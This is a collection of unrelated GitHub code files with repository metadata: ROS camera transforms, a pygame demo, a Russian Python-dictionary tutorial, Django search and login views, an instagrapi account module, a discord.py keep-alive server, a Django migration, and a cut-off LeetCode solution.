c3ColorOpticalFrame_to_c3Link_pos = np.asarray([0.015, 0.001, 0.000])\n c3ColorOpticalFrame_to_c3Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.505, -0.495, 0.504, 0.495]))\n c3ColorOpticalFrame_to_c3Link = c3ColorOpticalFrame_to_c3Link_rot\n c3ColorOpticalFrame_to_c3Link[:3, 3] = c3ColorOpticalFrame_to_c3Link_pos\n\n c1Link_to_c3ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c3_mat))\n c1Link_to_c3Link = np.dot(c1Link_to_c3ColorOpticalFrame, c3ColorOpticalFrame_to_c3Link)\n\n c1Link_to_c3Link_pos = c1Link_to_c3Link[:3, 3]\n c1Link_to_c3Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c3Link)\n\n # .................. for camera4 to camera1 ..................................... #\n c1_to_c4_mat = np.asarray([[-0.98034758, -0.19519336, -0.02860359, -0.01197254],\n [-0.00334246, -0.12853606, 0.9916992 , -0.37062505],\n [-0.19724969, 0.97230552, 0.12535759, 0.34614991],\n [ 0. , 0. , 0. , 1. ]])\n \n c4ColorOpticalFrame_to_c4Link_pos = np.asarray([0.015, 0.000, 0.000])\n c4ColorOpticalFrame_to_c4Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.506, -0.495, 0.504, 0.495]))\n c4ColorOpticalFrame_to_c4Link = c4ColorOpticalFrame_to_c4Link_rot\n c4ColorOpticalFrame_to_c4Link[:3, 3] = c4ColorOpticalFrame_to_c4Link_pos\n\n c1Link_to_c4ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c4_mat))\n c1Link_to_c4Link = np.dot(c1Link_to_c4ColorOpticalFrame, c4ColorOpticalFrame_to_c4Link)\n\n c1Link_to_c4Link_pos = c1Link_to_c4Link[:3, 3]\n c1Link_to_c4Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c4Link)\n\n # .................. for camera5 to camera1 ..................................... #\n c1_to_c5_mat = np.asarray([[-0.48201458, -0.77182315, 0.41466972, -0.20204585],\n [ 0.63925651, 0.0138576 , 0.7688687 , -0.31471432],\n [-0.59917698, 0.63568624, 0.48671341, 0.18944575],\n [ 0. , 0. , 0. , 1. ]])\n\n c5ColorOpticalFrame_to_c5Link_pos = np.asarray([0.015, 0.000, 0.000])\n c5ColorOpticalFrame_to_c5Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.505, -0.496, 0.500, 0.499]))\n c5ColorOpticalFrame_to_c5Link = c5ColorOpticalFrame_to_c5Link_rot\n c5ColorOpticalFrame_to_c5Link[:3, 3] = c5ColorOpticalFrame_to_c5Link_pos\n\n c1Link_to_c5ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c5_mat))\n c1Link_to_c5Link = np.dot(c1Link_to_c5ColorOpticalFrame, c5ColorOpticalFrame_to_c5Link)\n\n c1Link_to_c5Link_pos = c1Link_to_c5Link[:3, 3]\n c1Link_to_c5Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c5Link)\n\n # .................. for camera6 to camera1 ..................................... #\n c1_to_c6_mat = np.asarray([[0.35428684, -0.78506002, 0.50809605, -0.13837108],\n [ 0.82388472, 0.51907469, 0.22754217, -0.13304891],\n [-0.44237406, 0.33799738, 0.83070029, 0.03065303],\n [ 0. , 0. , 0. , 1. ]])\n\n c6ColorOpticalFrame_to_c6Link_pos = np.asarray([0.015, 0.000, 0.000])\n c6ColorOpticalFrame_to_c6Link_rot = tf.transformations.quaternion_matrix(np.asarray([0.505, -0.497, 0.503, 0.495]))\n c6ColorOpticalFrame_to_c6Link = c6ColorOpticalFrame_to_c6Link_rot\n c6ColorOpticalFrame_to_c6Link[:3, 3] = c6ColorOpticalFrame_to_c6Link_pos\n\n c1Link_to_c6ColorOpticalFrame = np.dot(c1Link_to_c1ColorOpticalFrame, tf.transformations.inverse_matrix(c1_to_c6_mat))\n c1Link_to_c6Link = np.dot(c1Link_to_c6ColorOpticalFrame, c6ColorOpticalFrame_to_c6Link)\n\n c1Link_to_c6Link_pos = c1Link_to_c6Link[:3, 3]\n c1Link_to_c6Link_quat = tf.transformations.quaternion_from_matrix(c1Link_to_c6Link)\n\n from IPython import embed; embed()\n\nif __name__ == '__main__':\n main()\n","repo_name":"htung0101/table_dome","sub_path":"backup/tf_cam1_to_cam2.py","file_name":"tf_cam1_to_cam2.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28269730372","text":"import pygame,sys,random\n\npygame.init()\n\nscreen_width,screen_height = 800,600 #\nscreen = pygame.display.set_mode((screen_width,screen_height))\n\nclass Rectangles(pygame.sprite.Sprite):\n def __init__(self,x_pos,y_pos):\n super().__init__()\n self.image = pygame.Surface((50,50))\n self.image.fill('red')\n self.rect = self.image.get_rect(center = (x_pos,y_pos))\n self.speed_x = 4\n self.speed_y = 3\n\n def update(self):\n self.rect.x += self.speed_x\n self.rect.y += self.speed_y\n\n if self.rect.right >= screen_width or self.rect.left <= 0:\n self.speed_x *= -1\n\n if self.rect.bottom >= screen_height or self.rect.top <= 0:\n self.speed_y *= -1\n\n\nplayer_group= pygame.sprite.Group()\nfor i in range(6):\n player = Rectangles(random.randrange(50,screen_width - 50),random.randrange(50,screen_height - 50))\n player_group.add(player)\n\nclock = pygame.time.Clock()\nwhile True:\n screen.fill((0,0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n player_group.draw(screen)\n player_group.update()\n\n pygame.display.update()\n clock.tick(60)\n","repo_name":"rikde1999/GAMES","sub_path":"1-Movements.py","file_name":"1-Movements.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29071218652","text":"#Словарь (dictionary) - это тип данных,\n#представляющий собой неупорядоченный набор пар ключ:значение.\n# (при этом каждый ключ, в рамках одного словаря, является уникальным).\n#typedef struct {\n# Py_hash_t me_hash;\n# PyObject *me_key;\n# PyObject *me_value;\n#} PyDictKeyEntry;\n\n#Здесь:\n\n#me_hash — кэшированный хеш-код me_key;\n#*me_key — указатель на объект, содержащий ключ элемента;\n#*me_value — указатель на объект, содержащий значение элемента.\n\n#Теперь перейдем к облику самой C-структуры словаря в Python:\n\n#typedef struct {\n# PyObject_HEAD\n# Py_ssize_t ma_used;\n# uint64_t ma_version_tag;\n# PyDictKeysObject *ma_keys;\n# PyObject **ma_values;\n#} PyDictObject;\n\n#PyObject_HEAD — заголовок;\n#Py_ssize_t ma_used — количество элементов словаря;\n#uint64_t ma_version_tag — уникальная версия словаря, меняющаяся каждый раз при его обновлении;\n#PyDictKeysObject *ma_keys — указатель на массив ключей;\n#PyObject **ma_values — массив указателей на значения ключей.\n#Если ma_values IS NULL, то все пары ключ:значение содержатся в ma_keys.\n\n\n\n#Базовая работа со словарями\n#Объявление словаря\n\nexample_dict = {}\nprint(type(example_dict))\nexample_dict_2 = {'keyOne': 'valueFirst', 'keyTwo': 'valueSecond', 'keyThree': 'valueThird'}\nexample_dict_2['keyThree']\n\n\n\n#Помимо литерального объявления, в Python существует возможность объявлять словари при помощи функции dict():\ninventory_dict = dict(right_hand='sword', left_hand='shield')\ninventory_dict\n\n\n\n#Вариант №1.\n#Если вам необходим словарь, каждому ключу которого сопоставлено одно и то же значение,\n# то можно воспользоваться методом fromkeys():\n\n# словарь из десяти элементов со значениями, равными 0\nzero_array_dict = dict.fromkeys(['a0', 'b0', 'c0', 'd0'], 0)\nzero_array_dict\n\n\n\n#Вариант №2.\n#С помощью функции-упаковщика zip(), вызванной внутри dict(),\n#вы можете составить словарь из двух списков (в случае несовпадения длин спи��ков, функция самостоятельно отсечет лишние элементы):\n\nkey_list = ['marvel_hero', 'dc_hero']\nvalue_list = ['Spiderman', 'Flash']\nsuperhero_dict = dict(zip(key_list, value_list))\nsuperhero_dict\nprint((superhero_dict))\n\n\n\n\n\n#Обращение к элементу словаря в Python\n#Извлечь значение элемента словаря можно единственным образом — обратившись к нему по его ключу:\nhero_inventory = dict(strong_right_hand='sword', strong_left_hand='shield +3')\nwhat_in_right_hand = hero_inventory['strong_right_hand']\n# или так: what_in_right_hand = hero_inventory.get('strong_right_hand')\nprint(what_in_right_hand)\n\n\n#В отличие от списков, номеров позиций в словарях нет\n#Добавление нового элемента в словарь\nsuperhero_dict = {'dc_hero': 'Flash'}\n\nsuperhero_dict['dark_horse_hero'] = 'Hellboy'\nprint(superhero_dict)\n#Аналогичным образом можно произвести замену существующего значения по его ключу:\nsuperhero_dict['dc_hero'] = 'Batwoman'\nprint(superhero_dict)\n\n\n\n#Удаление элемента из словаря\n#Для того чтобы удалить запись в словаре воспользуемся оператором del:\n# запись “'dark_horse_hero': 'Hellboy'” исчезнет. Прости, Красный!\ndel superhero_dict['dark_horse_hero']\nprint(superhero_dict)\n\n#Проверка на наличие ключа в словаре Python\n#Как отмечалось выше, обращение по несуществующему ключу вызывает ошибку в работе интерпретатора.\n#Поэтому, наличие ключа в словаре следует проверять. За это дело отвечает оператор in:\nif 'marvel_hero' in superhero_dict:\n print (\"Да, такой ключ есть\")\nelse:\n print(\"Этот ключ в словаре отсутствует!\")\n\n\n#Длина словаря в Python\n#Стоит помнить, что словарь — это лишь набор отображений, а не последовательность,\n#однако количество записей в нём мы все еще можем получить, воспользовавшись функцией len():\ntreasure = dict(t1='gold', t2='necklace')\nnum_of_items = len(treasure)\nprint(num_of_items)\n\n\n\n\n#Сортировка словаря\n#Сортировка по ключу\n#Сортировка по ключам выполняется с использованием функции sorted(). Работает функция так:\nstatistic_dict = {'b': 13, 'd': 30, 'e': -32, 'c': 93, 'a': 33}\nfor key in sorted(statistic_dict):\n print(key)\n\n\n#Сортировка по значению\n#А вот — один из вариантов сортировки словаря по значениям:\nelements = {'el1': 1, 'el2': 0, 'el3': -2, 'el4': 95, 'el5': 13}\nfor key, val in sorted(elements.items(), key= lambda x: x[1]):\n print(val)\n#Здесь стоит учитывать, что, сама по себе, запись sorted(elements.items(), key= lambda x: x[1]) \n#будет возвращать не словарь, а отсортированный список кортежей. Поэтому более правильным вариантом будет:\nelements = {'el1': 1, 'el2': 0, 'el3': -2, 'el4': 95, 'el5': 13}\nelements_sorted = {k: elements[k] for k in sorted(elements, key=elements.get, reverse=True)}\nprint(elements_sorted)\n\n\n\n\n\n\n#Перебор словаря в Python\n#Не является великой тайной и тот факт, что словарь, являющийся, по сути своей,\n#набором пар (т.е. коллекцией), можно всячески итерировать. Один из способов — перебор по ключам:\niter_dict = {'key_b': 1, 'key_d': 0, 'key_e': -2, 'key_c': 95, 'key_a': 13}\nfor key in iter_dict:\n print(key, end=' ')\n\n#Другой способ — проитерировать с использованием метода .items().\n#В этом случае на каждой итерации, пара ключ:значение будет возвращаться к нам в виде кортежа (‘ключ’, значение):\niter_dict = {'key_b': 1, 'key_d': 0, 'key_e': -2, 'key_c': 95, 'key_a': 13}\nfor item in iter_dict.items():\n print(item, end=' ')\n\n\n\n\n #Наконец, мы можем перебрать значения словаря, пользуясь классным методом .values():\nln_dict_iter = {'b': 'ln(1)', 'd': 'ln(10)', 'e': 'ln(2)', 'c': 'ln(95)', 'a': 'ln(13)'}\nfor v in ln_dict_iter.values():\n print(v)\n\n\n\n\n#Объед��нение словарей\n#Когда заходит речь об объединении двух словарей, то обязательно следует упомянуть,\n #что для пары сущностей типа \"словарь\" оператор \"+\"не определен.\n #Причина этого становится довольно очевидной — стоит лишь вспомнить,\n #что словарь не является последовательностью, а также задуматься над тем,\n # какая именно операция на множестве словарей должна быть реализована этим самым оператором \"+\".\n #Поэтому как-то так:\n\ndict_1 = {'010120': 55000, '030420': 8500, '170420': 30000}\ndict_2 = {'050520': 2900, '160520': 16573}\n\n#print(dict_1 + dict_2)#Будет ошибка!!!!\n\n#Ну а если вы всё-таки хотите добиться результата и всё же выполнить объединение двух словарей,\n#то достаточно воспользоваться методом .update():\nshowcase_1 = {'Apple': 2.7, 'Grape': 3.5, 'Banana': 4.4}\nshowcase_2 = {'Orange': 1.9, 'Coconut': 10}\nshowcase_1.update(showcase_2)\nprint(showcase_1)\n\n\n#Ограничения\n#оздавая словарь, вы не должны забывать о некоторых ограничениях, накладываемых, в основном, на его ключи.\n\n#анные, представляющие собой ключ словаря, должны быть уникальны внутри множества ключей этого словаря.\n#Проще говоря, не должно быть двух одинаковых ключей;\n#Ключ должен быть объектом неизменяемого типа, то есть строкой, числом или кортежем.\n#Если говорить строже, то объект содержащий ключ должен быть hashable. То есть иметь хеш-значение, которое не меняется в течение его жизненного цикла;\n#На значения нет никаких ограничений. Максимальный уровень свободы. \n#Они не обязаны быть ни уникальными, ни неизменяемыми, поэтому могут себе позволить быть какими угодно.\n\n\n\n#Методы словарей в Python\n#Перечислим основные словарные методы, которые помогут вам при работе с этим типом данных.\n\n#clear() — очищает заданный словарь, приводя его к пустому.\n#get() — отдаёт значение словаря по указанному ключу. Если ключ не существует,\n#а в качестве дополнительного аргумента передано значение по умолчанию, то метод вернет его. Если же значение по умолчанию опущено, метод вернет None.\n#items() — возвращает словарные пары ключ:значение, как соответствующие им кортежи.\n#keys() — возвращает ключи словаря, организованные в виде списка.\n#values() — подобным образом, возвращает список значений словаря.\n#pop() — удалит запись словаря по ключу и вернет её значение.\n#popitem() — выбрасывает пару ключ:значение из словаря и возвращает её в качестве кортежа. Такие пары возвращаются в порядке LIFO.\n#update() — реализует своеобразную операцию конкатенации для словарей. Он объединяет ключи и значения одного словаря с ключами и значениями другого. При этом если какие-то ключи совпадут, то результирующим значением станет значение словаря, указанного в качестве аргумента метода update.\n#copy() — создает полную копию исходного словаря.\n\n# clear()\nfarewell_dict = {'a': 'word', 'b': 3, 'c': 'x', 'd': 1, 'e': 12}\nfarewell_dict.clear()\nprint(farewell_dict)\n\n\n\n\n\n\n#Приведение Python-словарей к другим типам\n#dict to json\n#Чтобы сериализовать словарь в json формат, сперва необходимо импортировать сам модуль json:\nimport json\n#dict to json\n#Чтобы сериализовать словарь в json формат, сперва необходимо импортировать сам модуль json:\n#dump() позволит вам конвертировать питоновские словари в json объекты и сохранять их в файлы на вашем компьютере. \n#Это несколько напоминает работу с csv.\n#dumps() запишет словарь в строку Python, но согласно json-формату.\n\nphonebook = dict(j_row='John Connor', s_row='Sarah Connor')\nphonebook_json = json.dumps(phonebook)\nprint(phonebook_json)\n\n\nprint(type(phonebook_json))\n\n\n\n\n\n\n#dict to list\n#Для конвертации dict в list достаточно проитерировать словарь попарно с помощью метода items(),\n #и, на каждой итерации, добавлять пару ключ:значение к заранее созданному списку.\n #На выходе получим список списков,\n #где каждый подсписок есть пара из исходного словаря.\n\nmedicine_chest = dict(top_part='potion', bot_part='bandage')\nmedicine_list = []\nfor key, con in medicine_chest.items():\n temp = [key, con]\n medicine_list.append(temp)\nprint(medicine_list)\n\n\n#dict to string\n#Как указывалось выше, привести словарь к строке (str) можно при помощи модуля json. \n#Но, если словарь не слишком большой, \n#то эквивалентного результата можно добиться, используя стандартную функцию str():\nfood_machine = dict(tier_1='juice', tier_2='chocolate')\nf_machine_str = str(food_machine)\nprint(f_machine_str)\n\n\n\n#Генератор словарей\n#В Python существует возможность создавать словари с помощью генераторов. Генераторы выполняют цикл, \n#отбирают key:value пары на каждой итерации и заполняют, таким образом, новый словарь.\n#Создадим словарь, где нескольким элементам ряда натуральных чисел приводятся в соответствие их квадраты:\n\ngenerated_dict_of_squares = {x: x ** 2 for x in [1, 2, 3, 4]}\nprint(generated_dict_of_squares)\n\n\n#Также генератор удобен, когда нужно инициализировать какой-то имеющийся список ключей:\nlist_of_keys = ['q', 'w', 'e', 'r', 't']\ngenerated_dict = {k: 0 for k in list_of_keys}\nprint(generated_dict)\n\n\n\n\n\n#Вложенные словари\n#Отдельного упоминания заслуживает тот факт,\n#что элемент словаря может принимать в качестве значения другой словарь:\nnesting_d = {'fk': {'input_lvl_one': {'input_lvl_two': 42}}}\nprint(nesting_d['fk']['input_lvl_one']['input_lvl_two'])\n#Число уровней вложенности словарей неограниченно!\n","repo_name":"SanchoPanza29/Theory","sub_path":"1 урок Словари.py","file_name":"1 урок Словари.py","file_ext":"py","file_size_in_byte":16084,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28864941375","text":"\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.db import models\nfrom .models import *\nfrom django.db.models import Q\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom django.utils import timezone\nfrom datetime import timedelta\n\nfrom django.core import serializers\n\n\n# Create your views here.\ndef home(request):\n search = ''\n if 'search' in request.GET:\n search = request.GET.get('search')\n rooms = Room.objects.filter(Q(search_keyword__icontains=search) |\n Q(description__icontains=search) |\n Q(host__username=search)\n )\n keywords = Keyword.objects.annotate(\n total_search=models.Sum('search_keyword_users__total_search')\n ).all()\n\n users = User.objects.all()\n\n now = timezone.now()\n\n # implement from documentation \n # today = Keywordsearch.objects.filter(created__lte=now.today())\n # last_seven_days = Keywordsearch.objects.filter(created__gt=F('created') + timedelta(days=7))\n \n result = Keywordsearch.objects.aggregate(\n total=models.Count('keyword'),\n today=models.Count('keyword',filter=models.Q(created__date=now.date())),\n yesterday = models.Count('keyword',filter=models.Q(created__date__gte=(now - timedelta(days=1)).date())),\n last_seven_days = models.Count('keyword',filter=models.Q(created__date__gte=(now - timedelta(days=7)).date())),\n last_30_days = models.Count('keyword',filter=models.Q(created__date__gte=(now - timedelta(days=30)).date())),\n )\n context = {\n 'rooms': rooms,\n 'keywords': keywords,\n 'users': users,\n 'result':result\n }\n return render(request, 'home.html', context)\n\n\n@login_required(login_url='login')\ndef usearch(request):\n if request.method == \"POST\":\n # user = request.POST.get('username')\n user = request.user\n keyword = request.POST.get('search')\n print(keyword)\n try:\n keyword_obj = Keyword.objects.get(name=keyword)\n # new_data.save()\n except Keyword.DoesNotExist:\n keyword_obj = Keyword.objects.create(name=keyword)\n\n if keyword_obj:\n\n try:\n user_keyword = Keywordsearch.objects.get(keyword=keyword_obj, user=user)\n user_keyword.total_search += 1\n user_keyword.save()\n # new_data.save()\n except Keywordsearch.DoesNotExist:\n Keywordsearch.objects.create(keyword=keyword_obj, user=user, total_search=1)\n\n return redirect('home')\n\n\ndef loginUser(request):\n page = 'login'\n if request.method == 'POST':\n # get username and password form user input \n username = request.POST.get('username')\n password = request.POST.get('password')\n\n # check this user exit or not \n try:\n user = User.objects.get(username=username)\n except:\n return HttpResponse('User does not exit')\n\n # if user exit make sure the credential is correct or not \n user = authenticate(request, username=username, password=password)\n\n # login user and create the session on db browser and redirect home page \n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n return HttpResponse('Username or Password does not exit')\n\n context = {'page': page}\n return render(request, 'login_register.html', context)\n\n\ndef logoutPage(request):\n logout(request)\n return redirect('home')\n\n\ndef registerPage(request):\n form = UserCreationForm()\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.username = user.username\n user.save()\n login(request, user)\n return redirect('home')\n else:\n return HttpResponse('An error occured during registrations')\n\n context = {'form': form}\n return render(request, 'login_register.html', context)\n\n\ndef showusername(request):\n all_users = User.objects.all()\n context = {\n 'all_users': all_users\n }\n return render(request, 'home.html', context)\n\n\ndef everyusersearch(request,pk):\n user = User.objects.get(id=pk)\n user_srch = user.search_keywords.all()\n # print(user_srch)\n context = {\n 'user_search':user_srch\n }\n return render(request, 'all_user.html', context)\n\n\n# try for js/ajax\ndef tuto(request,pk):\n user = User.objects.get(id=pk)\n tasks= user.search_keywords.all()\n \n if request.is_ajax():\n task_serializers = serializers.serialize('json', tasks)\n return JsonResponse(task_serializers, safe=False)\n return JsonResponse({'message':'Wrong validation'})\n","repo_name":"abbappii/User-Search-History-Project","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20851684324","text":"from json.decoder import JSONDecodeError\nfrom pathlib import Path\nfrom typing import Dict\n\nimport requests\n\nfrom instagrapi.exceptions import ClientError, ClientLoginRequired\nfrom instagrapi.extractors import extract_account, extract_user_short\nfrom instagrapi.types import Account, UserShort\nfrom instagrapi.utils import dumps, gen_token\n\n\nclass AccountMixin:\n \"\"\"\n Helper class to manage your account\n \"\"\"\n\n def reset_password(self, username: str) -> Dict:\n \"\"\"\n Reset your password\n\n Returns\n -------\n Dict\n Jsonified response from Instagram\n \"\"\"\n response = requests.post(\n \"https://www.instagram.com/accounts/account_recovery_send_ajax/\",\n data={\"email_or_username\": username, \"recaptcha_challenge_field\": \"\"},\n headers={\n \"x-requested-with\": \"XMLHttpRequest\",\n \"x-csrftoken\": gen_token(),\n \"Connection\": \"Keep-Alive\",\n \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip,deflate\",\n \"Accept-Language\": \"en-US\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15\",\n },\n proxies=self.public.proxies,\n timeout=self.request_timeout,\n )\n try:\n return response.json()\n except JSONDecodeError as e:\n if \"/login/\" in response.url:\n raise ClientLoginRequired(e, response=response)\n raise ClientError(e, response=response)\n\n def account_info(self) -> Account:\n \"\"\"\n Fetch your account info\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n result = self.private_request(\"accounts/current_user/?edit=true\")\n return extract_account(result[\"user\"])\n\n def set_external_url(self, external_url) -> dict:\n \"\"\"\n Set new biography\n \"\"\"\n\n signed_body = f\"signed_body=SIGNATURE.%7B%22updated_links%22%3A%22%5B%7B%5C%22url%5C%22%3A%5C%22{external_url}%5C%22%2C%5C%22title%5C%22%3A%5C%22%5C%22%2C%5C%22link_type%5C%22%3A%5C%22external%5C%22%7D%5D%22%2C%22_uid%22%3A%22{self.user_id}%22%2C%22_uuid%22%3A%22{self.uuid}%22%7D\"\n return self.private_request(\n \"accounts/update_bio_links/\", data=signed_body, with_signature=False\n )\n\n def account_set_private(self) -> bool:\n \"\"\"\n Sets your account private\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n assert self.user_id, \"Login required\"\n user_id = str(self.user_id)\n data = self.with_action_data({\"_uid\": user_id, \"_uuid\": self.uuid})\n result = self.private_request(\"accounts/set_private/\", data)\n return result[\"status\"] == \"ok\"\n\n def account_set_public(self) -> bool:\n \"\"\"\n Sets your account public\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n assert self.user_id, \"Login required\"\n user_id = str(self.user_id)\n data = self.with_action_data({\"_uid\": user_id, \"_uuid\": self.uuid})\n result = self.private_request(\"accounts/set_public/\", data)\n return result[\"status\"] == \"ok\"\n\n def account_security_info(self) -> dict:\n \"\"\"\n Fetch your account security info\n\n Returns\n -------\n dict\n Contains useful information on security settings: {\n \"is_phone_confirmed\": true,\n \"is_two_factor_enabled\": false,\n \"is_totp_two_factor_enabled\": true,\n \"is_trusted_notifications_enabled\": true,\n \"is_eligible_for_whatsapp_two_factor\": true,\n \"is_whatsapp_two_factor_enabled\": false,\n \"backup_codes\": [...],\n \"trusted_devices\": [],\n \"has_reachable_email\": true,\n \"eligible_for_trusted_notifications\": true,\n \"is_eligible_for_multiple_totp\": false,\n \"totp_seeds\": [],\n \"can_add_additional_totp_seed\": false\n }\n \"\"\"\n return self.private_request(\n \"accounts/account_security_info/\", self.with_default_data({})\n )\n\n def account_edit(self, **data: Dict) -> Account:\n \"\"\"\n Edit your profile (authorized account)\n\n Parameters\n ----------\n data: Dict\n Fields you want to edit in your account as key and value pairs\n\n Returns\n -------\n Account\n An object of Account class\n \"\"\"\n fields = (\n \"external_url\",\n \"username\",\n \"full_name\",\n \"biography\",\n \"phone_number\",\n \"email\",\n )\n # if \"email\" in data:\n # # email is handled separately\n # self.send_confirm_email(data.pop(\"email\"))\n # if \"phone_number\" in data:\n # # phone_number is handled separately\n # self.send_confirm_phone_number(data.pop(\"phone_number\"))\n data = {key: val for key, val in data.items() if key in fields}\n if \"email\" not in data or \"phone_number\" not in data:\n # Instagram Error: You need an email or confirmed phone number.\n user_data = self.account_info().dict()\n user_data = {field: user_data[field] for field in fields}\n data = dict(user_data, **data)\n full_name = data.pop(\"full_name\", None)\n if full_name:\n # Instagram original field-name for full user name is \"first_name\"\n data[\"first_name\"] = full_name\n # Biography with entities (markup)\n result = self.private_request(\n \"accounts/edit_profile/\", self.with_default_data(data)\n )\n biography = data.get(\"biography\")\n if biography:\n self.account_set_biography(biography)\n return extract_account(result[\"user\"])\n\n def account_set_biography(self, biography: str) -> bool:\n \"\"\"\n Set biography with entities (markup)\n\n Parameters\n ----------\n biography: str\n Biography raw text\n\n Returns\n -------\n bool\n A boolean value\n \"\"\"\n data = {\"logged_in_uids\": dumps([str(self.user_id)]), \"raw_text\": biography}\n result = self.private_request(\n \"accounts/set_biography/\", self.with_default_data(data)\n )\n return result[\"status\"] == \"ok\"\n\n def account_change_picture(self, path: Path) -> UserShort:\n \"\"\"\n Change photo for your profile (authorized account)\n\n Parameters\n ----------\n path: Path\n Path to the image you want to update as your profile picture\n\n Returns\n -------\n UserShort\n An object of UserShort class\n \"\"\"\n upload_id, _, _ = self.photo_rupload(Path(path))\n result = self.private_request(\n \"accounts/change_profile_picture/\",\n self.with_default_data({\"use_fbuploader\": True, \"upload_id\": upload_id}),\n )\n return extract_user_short(result[\"user\"])\n\n def news_inbox_v1(self, mark_as_seen: bool = False) -> dict:\n \"\"\"\n Get old and new stories as is\n\n Parameters\n ----------\n mark_as_seen: bool\n Mark as seen or not\n\n Returns\n -------\n dict\n \"\"\"\n return self.private_request(\n \"news/inbox/\", params={\"mark_as_seen\": mark_as_seen}\n )\n\n def send_confirm_email(self, email: str) -> dict:\n \"\"\"\n Send confirmation code to new email address\n\n Parameters\n ----------\n email: str\n Email address\n\n Returns\n -------\n dict\n \"\"\"\n return self.private_request(\n \"accounts/send_confirm_email/\",\n self.with_extra_data(\n {\"send_source\": \"personal_information\", \"email\": email}\n ),\n )\n\n def send_confirm_phone_number(self, phone_number: str) -> dict:\n \"\"\"\n Send confirmation code to new phone number\n\n Parameters\n ----------\n phone_number: str\n Phone number\n\n Returns\n -------\n dict\n \"\"\"\n return self.private_request(\n \"accounts/initiate_phone_number_confirmation/\",\n self.with_extra_data(\n {\n \"android_build_type\": \"release\",\n \"send_source\": \"edit_profile\",\n \"phone_number\": phone_number,\n }\n ),\n )\n","repo_name":"adw0rd/instagrapi","sub_path":"instagrapi/mixins/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","stars":2300,"dataset":"github-code","pt":"52"} +{"seq_id":"38047791779","text":"import os\n\nfrom aiohttp import web\nfrom discord.ext import commands, tasks\n\n\nclass Flare(commands.Cog):\n def __init__(self, bot):\n self.bot: commands.Bot = bot\n self.web_server.start()\n self.app = web.Application()\n self.routes = web.RouteTableDef()\n\n @self.routes.get(os.environ.get('FLARE_PATH', \"/\"))\n async def welcome(request):\n return web.Response(text=\"Bot is Online!!\")\n\n self.webserver_port = os.environ.get('FLARE_PORT', 5000)\n self.app.add_routes(self.routes)\n\n @tasks.loop()\n async def web_server(self):\n runner = web.AppRunner(self.app)\n await runner.setup()\n site = web.TCPSite(runner, host=os.environ.get(\"FLARE_HOST\", None), port=self.webserver_port)\n await site.start()\n\n @web_server.before_loop\n async def web_server_before_loop(self):\n await self.bot.wait_until_ready()\n","repo_name":"Cobular/Flare-DiscordPy","sub_path":"flare/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40701000649","text":"# -*- coding: utf-8 -*-\n\"\"\"Migration to change sr-Cyrl locale to sr locale\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef change_locale_sr_Cyrl_to_sr_forwards(apps, schema_editor):\n\tDocument = apps.get_model(\"wiki\", \"Document\")\n\tLocale = apps.get_model(\"wiki\", \"Locale\")\n\tDocument.objects.filter(locale='sr-Cyrl').update(locale='sr')\n\tLocale.objects.filter(locale='sr-Cyrl').update(locale='sr')\n\ndef change_locale_sr_Cyrl_to_sr_backwards(apps, schema_editor):\n\tDocument = apps.get_model(\"wiki\", \"Document\")\n\tLocale = apps.get_model(\"wiki\", \"Locale\")\n\tDocument.objects.filter(locale='sr').update(locale='sr-Cyrl')\n\tLocale.objects.filter(locale='sr').update(locale='sr-Cyrl')\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('wiki', '0003_add_related_documents_field'),\n ]\n\n operations = [\n migrations.RunPython(change_locale_sr_Cyrl_to_sr_forwards, change_locale_sr_Cyrl_to_sr_backwards),\n ]\n","repo_name":"feer56/Kitsune2","sub_path":"kitsune/wiki/migrations/0004_change_locale_sr_Cyrl_to_sr.py","file_name":"0004_change_locale_sr_Cyrl_to_sr.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39530401419","text":"class Solution:\n def surfaceArea(self, grid: List[List[int]]) -> int:\n \n top_down = sum([sum(i > 0 for i in row) for row in grid]) * 2\n sides = sum([sum(i for i in row) for row in grid]) * 